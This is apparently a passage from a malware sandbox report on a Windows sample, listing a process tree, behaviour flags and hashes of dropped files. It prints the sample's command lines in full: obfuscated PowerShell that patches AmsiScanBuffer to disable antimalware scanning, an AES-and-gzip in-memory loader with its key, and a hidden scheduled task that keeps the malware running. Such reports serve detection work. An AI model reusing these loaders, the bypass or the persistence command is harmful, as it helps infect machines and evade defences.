,'P'+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+','+[Char](72)+'i'+'d'+'eB'+'y'+''+[Char](83)+'ig,'+[Char](78)+'e'+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'',$WXxiytiDmU,$jQTUterbvHBIxE).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+''+'i'+'m'+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+'ag'+[Char](101)+''+'d'+'');Write-Output $nroGedzZSVZ.CreateType();}$DODpLOnFksKcP=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+''+'t'+'em.'+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+'d'+''+[Char](115)+'');$oDjiOhHAGHWQNV=$DODpLOnFksKcP.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'Pro'+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+',S'+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JhUSuyUUnjupDQaWKDN=UrpccseDxPsG @([String])([IntPtr]);$oWHmiumCDkrFaLVDxBOzaj=UrpccseDxPsG 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$uLmyNPzugee=$DODpLOnFksKcP.GetMethod(''+[Char](71)+'et'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+'H'+''+[Char](97)+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+'n'+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+'l')));$sEmfXrCZfAstme=$oDjiOhHAGHWQNV.Invoke($Null,@([Object]$uLmyNPzugee,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$GdRENnwGcYvkloHLd=$oDjiOhHAGHWQNV.Invoke($Null,@([Object]$uLmyNPzugee,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+''+'t'+'')));$vPgmhha=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sEmfXrCZfAstme,$JhUSuyUUnjupDQaWKDN).Invoke(''+'a'+'m'+[Char](115)+'i'+'.'+''+'d'+'l'+[Char](108)+'');$uVQmZSjSGubsATebz=$oDjiOhHAGHWQNV.Invoke($Null,@([Object]$vPgmhha,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+'a'+'n'+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$XsJDotkpKL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GdRENnwGcYvkloHLd,$oWHmiumCDkrFaLVDxBOzaj).Invoke($uVQmZSjSGubsATebz,[uint32]8,4,[ref]$XsJDotkpKL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$uVQmZSjSGubsATebz,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GdRENnwGcYvkloHLd,$oWHmiumCDkrFaLVDxBOzaj).Invoke($uVQmZSjSGubsATebz,[uint32]8,0x20,[ref]$XsJDotkpKL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+'T'+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
        cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ZQNyOTmGcucG{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TJjJTDZYERDFZl,[Parameter(Position=1)][Type]$VtglJpHUzI)$aaFRHMhVWBt=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+'lec'+[Char](116)+'e'+[Char](100)+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+'g'+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'e'+'m'+''+[Char](111)+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+'p'+'e'+'',''+'C'+''+'l'+''+'a'+''+[Char](115)+'s,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+',Se'+'a'+''+[Char](108)+'e'+[Char](100)+''+','+''+'A'+''+[Char](110)+'s'+'i'+'C'+'l'+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+'ut'+[Char](111)+''+'C'+'l'+'a'+'s'+'s'+'',[MulticastDelegate]);$aaFRHMhVWBt.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'ByS'+'i'+'g'+[Char](44)+'P'+'u'+'bl'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$TJjJTDZYERDFZl).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');$aaFRHMhVWBt.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+'k'+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+[Char](44)+'H'+[Char](105)+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+'V'+'i'+''+[Char](114)+''+'t'+''+'u'+'a'+[Char](108)+'',$VtglJpHUzI,$TJjJTDZYERDFZl).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+'n'+[Char](97)+''+'g'+'e'+'d'+'');Write-Output $aaFRHMhVWBt.CreateType();}$iFZsQzxEdxkoM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+'r'+''+'o'+''+[Char](115)+''+'o'+'ft'+'.'+'W'+[Char](105)+''+[Char](110)+'32'+[Char](46)+''+[Char](85)+''+'n'+''+'s'+''+'a'+''+'f'+'e'+[Char](78)+'a'+[Char](116)+''+'i'+'v'+'e'+''+'M'+''+'e'+''+[Char](116)+'hod'+[Char](115)+'');$QBepLGYtUXKJzT=$iFZsQzxEdxkoM.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+'c'+[Char](65)+'dd'+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SSelmtnaFRHeZEJJvyM=ZQNyOTmGcucG @([String])([IntPtr]);$lmgyrAElOuQwxjNwPXfHFK=ZQNyOTmGcucG @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zNSnNzlgkvI=$iFZsQzxEdxkoM.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+'u'+'le'+[Char](72)+'a'+[Char](110)+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+'n'+'e'+[Char](108)+''+'3'+''+'2'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$ITHIEGuyaDtqci=$QBepLGYtUXKJzT.Invoke($Null,@([Object]$zNSnNzlgkvI,[Object](''+'L'+''+[Char](111)+''+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+'r'+[Char](121)+'A')));$aFdLaLBiJqefOgWLC=$QBepLGYtUXKJzT.Invoke($Null,@([Object]$zNSnNzlgkvI,[Object](''+[Char](86)+''+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$CsaRoKd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ITHIEGuyaDtqci,$SSelmtnaFRHeZEJJvyM).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+''+'.'+''+'d'+'l'+[Char](108)+'');$HLQXhdPSUgXTqqktb=$QBepLGYtUXKJzT.Invoke($Null,@([Object]$CsaRoKd,[Object]('A'+[Char](109)+'s'+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+'B'+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+'r')));$ttWCnngniC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aFdLaLBiJqefOgWLC,$lmgyrAElOuQwxjNwPXfHFK).Invoke($HLQXhdPSUgXTqqktb,[uint32]8,4,[ref]$ttWCnngniC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$HLQXhdPSUgXTqqktb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aFdLaLBiJqefOgWLC,$lmgyrAElOuQwxjNwPXfHFK).Invoke($HLQXhdPSUgXTqqktb,[uint32]8,0x20,[ref]$ttWCnngniC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Drops file in System32 directory
        - Suspicious use of SetThreadContext
        - Modifies data under HKEY_USERS

        C:\Windows\System32\Conhost.exe
            cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k localservice -s nsi

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k netsvcs -s Themes

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k localservice -s EventSystem

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k netsvcs -s UserManager

    c:\windows\system32\sihost.exe
        cmdline: sihost.exe

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k netsvcs -s SENS

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k networkservice -s NlaSvc

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k networkservice -s Dnscache

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k localservice -s netprofm

C:\Windows\System32\svchost.exe
    cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe
    cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k appmodel -s StateRepository

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection

C:\Windows\System32\spoolsv.exe
    cmdline: C:\Windows\System32\spoolsv.exe

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k netsvcs -s Browser

C:\Windows\sysmon.exe
    cmdline: C:\Windows\sysmon.exe

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
    - Drops file in System32 directory

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k netsvcs -s WpnService

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker

C:\Windows\system32\wbem\unsecapp.exe
    cmdline: C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\Explorer.EXE
    cmdline: C:\Windows\Explorer.EXE

    C:\Windows\system32\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V4Hy8emI3mM56PZmDPionZmQDoSVLTkUh0buDVVDWdM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S+QbBB6/ak2YmQDkQn0LyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $uBtlQ=New-Object System.IO.MemoryStream(,$param_var); $FyNRj=New-Object System.IO.MemoryStream; $GWKHD=New-Object System.IO.Compression.GZipStream($uBtlQ, [IO.Compression.CompressionMode]::Decompress); $GWKHD.CopyTo($FyNRj); $GWKHD.Dispose(); $uBtlQ.Dispose(); $FyNRj.Dispose(); $FyNRj.ToArray();}function execute_function($param_var,$param2_var){ $pANIv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mSXDz=$pANIv.EntryPoint; $mSXDz.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$eOdAN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($lhvkI in $eOdAN) { if ($lhvkI.StartsWith(':: ')) { $JmDDg=$lhvkI.Substring(3); break; }}$payloads_var=[string[]]$JmDDg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            - Command and Scripting Interpreter: PowerShell
            - Modifies registry class
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_392_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_392.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                - Command and Scripting Interpreter: PowerShell
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

            C:\Windows\SysWOW64\WScript.exe
                cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_392.vbs"
                - Suspicious use of WriteProcessMemory

                C:\Windows\SysWOW64\cmd.exe
                    cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_392.bat" "
                    - Suspicious use of WriteProcessMemory

                    C:\Windows\System32\Conhost.exe
                        cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V4Hy8emI3mM56PZmDPionZmQDoSVLTkUh0buDVVDWdM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S+QbBB6/ak2YmQDkQn0LyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $uBtlQ=New-Object System.IO.MemoryStream(,$param_var); $FyNRj=New-Object System.IO.MemoryStream; $GWKHD=New-Object System.IO.Compression.GZipStream($uBtlQ, [IO.Compression.CompressionMode]::Decompress); $GWKHD.CopyTo($FyNRj); $GWKHD.Dispose(); $uBtlQ.Dispose(); $FyNRj.Dispose(); $FyNRj.ToArray();}function execute_function($param_var,$param2_var){ $pANIv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mSXDz=$pANIv.EntryPoint; $mSXDz.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_392.bat';$eOdAN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_392.bat').Split([Environment]::NewLine);foreach ($lhvkI in $eOdAN) { if ($lhvkI.StartsWith(':: ')) { $JmDDg=$lhvkI.Substring(3); break; }}$payloads_var=[string[]]$JmDDg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                        - Blocklisted process makes network request
                        - Command and Scripting Interpreter: PowerShell
                        - Suspicious behavior: EnumeratesProcesses
                        - Suspicious use of SetWindowsHookEx
                        - Suspicious use of WriteProcessMemory

                        C:\Users\Admin\AppData\Local\Temp\install.exe
                            cmdline: "C:\Users\Admin\AppData\Local\Temp\install.exe"
                            - Executes dropped EXE

                        C:\Windows\SysWOW64\cmd.exe
                            cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GGJD5csip1tk.bat" "

                            C:\Windows\System32\Conhost.exe
                                cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

                            C:\Windows\SysWOW64\chcp.com
                                cmdline: chcp 65001

                            C:\Windows\SysWOW64\PING.EXE
                                cmdline: ping -n 10 localhost
                                - Runs ping.exe

                        C:\Users\Admin\AppData\Local\Temp\install.exe
                            cmdline: "C:\Users\Admin\AppData\Local\Temp\install.exe"
                            - Executes dropped EXE

C:\Windows\System32\RuntimeBroker.exe
    cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe
    cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k localservice -s CDPSvc

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV

C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
    - Modifies data under HKEY_USERS

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
    cmdline: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc

C:\Windows\system32\DllHost.exe
    cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\ApplicationFrameHost.exe
    cmdline: C:\Windows\system32\ApplicationFrameHost.exe -Embedding

C:\Windows\System32\InstallAgent.exe
    cmdline: C:\Windows\System32\InstallAgent.exe -Embedding

C:\Windows\system32\DllHost.exe
    cmdline: C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\wbem\wmiprvse.exe
    cmdline: C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\sysWOW64\wbem\wmiprvse.exe
    cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\wbem\wmiprvse.exe
    cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize: 2KB
    MD5: ac3d19fbb5c5f10833f1882308f77548
    SHA1: ac880466fd99a5719fedc7289b00d78ba7088e06
    SHA256: 3353b90af649198e084632af776f8c6ea3a9302da5a50d85f7ecde1c7ad295df
    SHA512: b5e6369d7f475e9931d19fb2a5305b4c901ca5fcac5d788d064b6a1b1d6de2034e84932ac243d5056c745b924a2e9537a06b4172fab364402263788c814bc28b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 17KB
    MD5: 602697434d1fbc5948155cd4b07cef92
    SHA1: b830614c93452a2a3aeef20a51ec7775bb898b5e
    SHA256: b34b9a6d135915c198765c443feb086d073832e672ce4453f2f04788a9403aab
    SHA512: a2e895eaea85cd5302eeb59143dcfa65630f7321d91bbe0f1559249f10b772fa0d4ea5aa79616a06c64ee486fca22759286e86dafff72acf7a11bc515a49ecec

C:\Users\Admin\AppData\Local\Temp\GGJD5csip1tk.bat
    Filesize: 276B
    MD5: 41cb236d5025fe4aa30916db372b7eab
    SHA1: fede30b6d6aff06b5d56c762b64d68e7196dc465
    SHA256: c56c84ebe8652c8b66de4b8fea77b81aca7d74a40d3011ccd877f75cc2a8be52
    SHA512: b8de4588b76bce88c04c2bbf4939c968a7dd737ff4d3cef2af246babbe0b45124d135842c52a189750c576ac88b502bf741088e076f4455c06055467e04b572e

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1xpgydi4.lbp.ps1
    Filesize: 1B
    MD5: c4ca4238a0b923820dcc509a6f75849b
    SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
    SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
    SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\install.exe
    Filesize: 162KB
    MD5: 152e3f07bbaf88fb8b097ba05a60df6e
    SHA1: c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
    SHA256: a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
    SHA512: 2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

C:\Users\Admin\AppData\Roaming\$SXR-LOGS\05-14-~1
    Filesize: 224B
    MD5: a84397af7dc1ce2cee71c76d03b1bcd7
    SHA1: e545cc3ec6e4de56028bfddcf1929364d403048e
    SHA256: 02f75c4e6aa15bbb6329a9f44baf2a6804f514941bc98a2af2464d704144afbf
    SHA512: 095db46a47071b24ce4a79d53d9440344d86435b17bb584c58419f1207827a1f263ee334009b43bfa57353906df2fcad750126fef67101b6980656a9a8366716

C:\Users\Admin\AppData\Roaming\startup_str_392.bat
    Filesize: 513KB
    MD5: a84be587721ab2558489178539f283e6
    SHA1: 5a48f5c98f7366d13f371965c19c98a5754bd90b
    SHA256: 32cfb4e83f43787c79ef6a15bef53137a0e9a6d6d558ef1532993fb8369cc8fd
    SHA512: c1c4e35246c39f3e710cbd261187c7968d75c65fd1c4b96f6caa6ddec1484ca42f2431f4184ec0061cd7b2e0d3478db993f88a043106f0ce9d7ae859c3f5f931

C:\Users\Admin\AppData\Roaming\startup_str_392.vbs
    Filesize: 115B
    MD5: 53d92eb6350fdb3e9ec2c3fb1752723b
    SHA1: c26216a618184875ef9c3da5523d217002d064cf
    SHA256: b92104fd3958f17653ab3e8923807fae4920eecc046abdb90663989122debf75
    SHA512: 1f78e4504a941f93df78ff8891bdaf60256783a19eeddff5b91f06a3773252a24f8aa9b446bba974fc8efa4ef9528ffe5ea81ccf7b3aaaa9fd691d42b28ac445

C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
    Filesize: 412B
    MD5: d8a99f426be6a1c0f9a8c574d87acd08
    SHA1: 258650a28621fd86ac87f046c478eda527f5c4bc
    SHA256: bfbcdd06b348856a4ffeddd879e0b1b17415e2b1ce7a701e378ba4708e2a1a17
    SHA512: 7571968ca45dcf4181dbd9c9d1b5849f29ccc48ad6b065dbd072c4b93ffa019da3874782531c107a9563c051743bdf81d592ff00a50f9dba49575e61aad9df09

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
    Filesize: 3KB
